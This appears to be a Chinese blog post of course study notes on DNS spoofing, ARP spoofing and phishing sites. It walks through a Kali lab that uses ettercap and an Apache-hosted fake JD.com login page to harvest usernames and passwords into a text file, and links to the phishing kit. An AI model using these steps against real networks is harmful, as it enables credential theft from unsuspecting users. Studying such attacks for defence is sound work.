[网络安全学习篇23]:DNS欺骗与钓Y网站(千峰网络安全视频笔记 p114-p116)

目录

 

DNS欺骗、ARP攻击及钓鱼网站制作

实现目标

具体实验步骤:


DNS欺骗、ARP攻击及钓鱼网站制作

钓鱼者运用社会工程学只是诱骗受害者,以未授权情况下获取对方的姓名、年龄、邮箱账号、甚至是银行卡密码等私人信息

钓鱼往往呵社会工程学结合进行诱导,而社会工程学时黑客的内功,能否灵活运用可以体现一个黑客的个人修为,所以说防人之心不可无,。

社会工程学黑客常见伎俩:

电话号码欺骗

利用坏消息作案

滥用网民对社交等网络的信任

二维码引诱

等等

实现目标

使用kali系统模拟攻击者,利用中间人攻击手段来对受害者进行DNS欺骗、使受害者通过访问假的京东网站,来获取用户登录的用户名与密码

具体实验步骤:

ifconfig eth0 10.1.1.2 /24    配置ip
ifconfig eth0      查看IP
vim /etc/ettercap/etter.dns     进行DNS欺骗配置
    dd  删除
    a     插入
    写入:www.qf.com A  10.1.1.2
        www.qf.com ptr 10.1.1.2      防止目标主机反向解析
    "ESC"键退出插入界面
    ":wq"  退出

测试文件:https://pan.baidu.com/s/18HeixJ-duIkcbomksRhKVQ     提取码:oste

将其复制至Kali虚拟机桌面
systemctl start apache2    开启apache服务
netstat -antpl   查看apache 80端口是否开启
vim /var/www/html    进入默认网站文件目录
    rm -rf *    删除当前文件夹下所有文件
    cp -r /root/Desktop/s1/* ./     复制到该目录下
    权限设置:
    ls -l     查看文件权限
    chmod 777 1.txt     将1.txt开放至最低权限
    cat 1.txt     查看获取到的账户密码
开启ettercap软件
    开启ARP欺骗
    开启DNS欺骗
发布了44 篇原创文章 · 获赞 21 · 访问量 2451

猜你喜欢

转载自blog.csdn.net/weixin_43252204/article/details/105378368